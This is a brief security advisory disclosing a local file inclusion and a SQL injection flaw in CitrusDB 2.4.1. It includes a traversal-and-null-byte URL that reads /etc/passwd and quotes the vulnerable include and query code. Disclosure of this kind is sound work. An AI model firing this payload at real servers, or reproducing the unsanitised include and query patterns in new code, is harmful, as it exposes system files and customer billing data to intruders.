CitrusDB 2.4.1 - LFI/SQLi Vulnerability



CitrusDB 2.4.1 - LFI/SQLi Vulnerability
Author: Michal `wacky` Blaszczak
WWW: blaszczakm.blogspot.com


CitrusDB is an open source customer service and billing database.
It can be used by customer service personnel to provide sales and support to customers,
and by billing staff to bill customers for their services via invoices and credit card batches.
Customers may access the Online customer account manager to view their services, billing history,
and make service and support requests online.

1) LFI
http://192.168.51.8/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base

index.php:315

$filepath = "$path_to_citrus/$load.php";
if (file_exists($filepath)) {
include('./'.$load.'.php');


2) SQL INJECTION

include/user.class.php:134

$sql="SELECT password FROM user WHERE username='$user_name' LIMIT 1";



Relevant Pages

  • Re: General question on charging for data access
    ... >>metric for value received by a customer. ... >Connection time no longer provides a good metric, ... Consider a charge per query or a charge per unit of data. ... billing process by ...
    (comp.lang.php)
  • Re: Help with Design
    ... It's not Paradox that isn't following the conventions - it is the original ... Congratulations for convincing your customer to allow you a redesign! ... something (NOT the billing code)? ...
    (microsoft.public.access.tablesdbdesign)
  • Re: Help with Design
    ... In the report, the subassemblies can be grouped by sub field, but I ... I have a customer who has been using Paradox and they have requested that I ... These names are associated directly with billing codes ...
    (microsoft.public.access.tablesdbdesign)
  • Re: Need help setting up a Parent form with three subforms
    ... (customer name, customer address)" ... Addresses (with an AddrTypeID specified -- billing, shipping, or both) ... I am assuming this is your Quotes table ... CustEqID and store a long integer CustEqID in the Quote table -- by ...
    (microsoft.public.access.forms)
  • Help with Design
    ... I have a customer who has been using Paradox and they have requested that I ... These names are associated directly with billing codes ... requests, I consolidated all the tables into one table provided filtered ...
    (microsoft.public.access.tablesdbdesign)